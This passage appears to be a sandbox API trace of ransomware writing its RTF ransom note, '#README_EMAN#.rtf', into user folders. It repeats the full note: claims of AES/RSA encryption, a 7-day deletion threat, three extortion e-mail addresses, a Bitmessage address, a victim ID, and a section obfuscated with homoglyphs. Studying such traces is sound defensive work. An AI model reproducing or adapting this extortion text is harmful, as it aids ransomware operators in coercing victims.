;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.336] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.336] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.337] CloseHandle (hObject=0x2e8) returned 1 [0289.337] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0289.337] GetLastError () returned 0x2 [0289.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 